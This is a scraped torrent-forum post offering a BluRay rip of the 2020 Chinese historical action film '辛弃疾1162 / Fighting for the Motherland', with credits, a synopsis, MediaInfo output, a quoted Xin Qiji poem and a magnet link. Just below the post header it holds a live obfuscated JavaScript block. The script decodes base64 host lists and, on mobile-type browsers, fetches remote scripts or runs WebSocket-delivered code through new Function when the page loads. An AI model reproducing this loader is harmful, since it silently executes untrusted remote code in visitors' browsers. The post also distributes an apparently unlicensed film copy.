辛弃疾1162[国语配音].Fighting.for.the.Motherland.2020.1080p.BluRay.DTS.x265-10bit 5.39GB

版主小s 13天前 270

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 辛弃疾1162 / Fighting for the Motherland
◎年  代 2020
◎产  地 中国大陆
◎类  别 动作 / 古装
◎语  言 汉语普通话
◎上映日期 2020-01-02(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt12764298/
◎豆瓣评分 6.0/10 (4309人评价)
◎豆瓣链接 https://movie.douban.com/subject/34906611/
◎片  长 110分钟
◎导  演 张哲 Zhe Zhang (id:1427760)
       张明国 Mingguo Zhang (id:1384168)
◎编  剧 周枫平 Fengping Zhou (id:1421121)
◎演  员 谢苗 Miu Tse (id:1314627)
       南笙 Sheng Nan (id:1339697)
       郑文森 Jason Zheng (id:1376536)
       高名扬 Mingyang Gao (id:1357834)
       马俊凯  (id:1434397)

◎标  签 辛弃疾 / 古装 / 南宋 / 热血 / 爱国诗人 / 文武双全 / 战争 / 中国

◎简  介
  1161年,大宋国土幅裂,金主完颜亮侵占中原,并再欲大举南侵。中原百姓不堪严苛压榨,奋起抗金,年方二十一岁的辛弃疾聚集乡众参加了由耿京领导的一支声势浩大的起义军,战功赫然。1162年,力主驱逐侵虏、收复失土、实现统一的辛弃疾,奉命南下说服南宋朝廷北伐,在他完成使命归来,却见主帅耿京被叛徒杀害后义军溃散的乱状。侠义所使、激愤所驱和再凝义军士气所谋,辛弃疾率五十多骑突袭数万人金军大营,生擒叛徒南归,写就一段悲壮的峥嵘历史。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 50389499598833233142345988036433107424 (0x25E8AA2446536A8411763973423959E0)

  4. Complete name                            : Fig[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.39 GiB

  8. Duration                                 : 1 h 50 min

  9. Overall bit rate                         : 6 970 kb/s

  10. Movie name                               : Fighting for the Motherland 2020 1080p BluRay DTS [email protected]

  11. Encoded date                             : UTC 2021-09-01 21:36:49

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 50 min

  21. Bit rate                                 : 5 428 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 720 pixels

  24. Display aspect ratio                     : 2.667

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.164

  31. Stream size                              : 4.20 GiB (78%)

  32. Title                                    : [email protected]

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 50 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 1.17 GiB (22%)

  51. Title                                    : Mandarin

  52. Language                                 : Chinese

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 45 min

  62. Bit rate                                 : 23.4 kb/s

  63. Count of elements                        : 3146

  64. Stream size                              : 17.7 MiB (0%)

  65. Title                                    : CHS

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 45 min

  76. Bit rate                                 : 24.6 kb/s

  77. Count of elements                        : 3146

  78. Stream size                              : 18.6 MiB (0%)

  79. Title                                    : CHT

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Menu

  84. 00:00:00.000                             : en:Chapter 01

  85. 00:09:08.298                             : en:Chapter 02

  86. 00:15:55.621                             : en:Chapter 03

  87. 00:27:40.158                             : en:Chapter 04

  88. 00:36:06.039                             : en:Chapter 05

  89. 00:46:24.907                             : en:Chapter 06

  90. 00:56:07.698                             : en:Chapter 07

  91. 01:08:04.414                             : en:Chapter 08

  92. 01:18:02.845                             : en:Chapter 09

  93. 01:26:53.208                             : en:Chapter 10

  94. 01:36:06.928                             : en:Chapter 11

  95. 01:44:36.812                             : en:Chapter 12

看到辛弃疾,就想起他的破阵子:
醉里挑灯看剑,梦回吹角连营。八百里分麾下炙,五十弦翻塞外声,沙场秋点兵。
马作的卢飞快,弓如霹雳弦惊。了却君王天下事,赢得生前身后名。可怜白发生!

儿时不懂,现在来看这词,真tm豪放


TAGS 动作 古装

磁力链:
  • magnet:?xt=urn:btih:FC24238053AE8D523ACE100C4EA6014C98A1D2EA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回